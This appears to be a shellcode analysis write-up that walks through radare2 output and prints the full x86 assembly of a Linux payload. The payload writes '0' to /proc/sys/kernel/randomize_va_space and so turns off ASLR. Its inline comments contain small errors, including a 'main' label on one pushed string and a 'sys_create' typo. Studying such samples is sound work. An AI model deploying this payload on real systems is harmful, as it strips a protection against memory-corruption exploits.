We’ll be analyzing the copied and compiled variant “asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop.asm”. Using Radare2 can be tedious at times, but quickly gives an overview of used functions, strings and even graphical, colorful views.
This is an analysis of the non-optimized version, not using JMP/POP/CALL’s.
Version used
$ r2 -v
radare2 3.0.1 0 @ linux-x86-64 git.3.0.1
commit: HEAD build: 2018-10-20__19:42:15Run all analysis options and open binary
$ r2 -AAA asm_linx86_aslr-disable_shellstorm_sample2-alt
WARNING: Cannot initialize dynamic strings
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[x] Enable constraint types analysis for variables
[0x08048060]>Show sections
[0x08048060]> iS
[Sections]
Nm Paddr Size Vaddr Memsz Perms Name
00 0x00000000 0 0x00000000 0 ----
01 0x00000060 83 0x08048060 83 -r-x .text
02 0x000000b3 33 0x00000000 33 ---- .shstrtab
03 0x0000019c 128 0x00000000 128 ---- .symtab
04 0x0000021c 83 0x00000000 83 ---- .strtabList entrypoints
[0x08048060]> ie
[Entrypoints]
vaddr=0x08048060 paddr=0x00000060 baddr=0x08048000 laddr=0x00000000 haddr=0x00000018 hvaddr=0x08048018 type=program
1 entrypoints
Set seeker to address of entrypoint
[0x08048060]> s 0x08048060
[0x08048060]> Show function disassembly
Clearly the string is being shown which will be pushes on the stack for the functions to read: the address point by ESP will be copied to EBX for the first argument of “sys_create”.
asm_linx86_aslr-disable_shellstorm_sample2-alt.asm
global _start
section .text
_start:
; Clear registers
xor eax,eax
; sys_creat
; int creat(const char *pathname, mode_t mode);
push eax ; Terminate string with NULL
push 0x65636170 ; 'pace'
push 0x735f6176 ; 'va_s'
push 0x5f657a69 ; 'ize_'
push 0x6d6f646e ; 'ndom'
push 0x61722f6c ; main
push 0x656e7265 ; 'erne'
push 0x6b2f7379 ; 'ys/k'
push 0x732f636f ; 'oc/s'
push 0x72702f2f ; '//pr'
mov ebx,esp ; Copy stackpointer to stringvalue in EBX for pathname argument
mov cx,0x2bc ; Value for mode argument, 700 --> S_IRWXU
mov al,0x8 ; sys_create call 0x8
int 0x80 ; syscall
; sys_write
; ssize_t write(int fd, const void *buf, size_t count);
mov ebx,eax ; Copy previously stored FD from creat into EBX
push eax ; Push the FD on stack
mov dx,0x3a30 ; Count value parameter for size
push dx ; Put value on stack
mov ecx,esp ; Copy the current stackpointer to ECX for buffer argument
xor edx,edx ; Clear EDX
inc edx ; Set to 1
mov al,0x4 ; Set syscall 0x4 for write
int 0x80 ; syscall
; sys_close
mov al,0x6 ; Close call
int 0x80 ; syscall
; sys_exit
inc eax ; Previous value after syscall was 0, increment for 1
int 0x80 ; syscall exit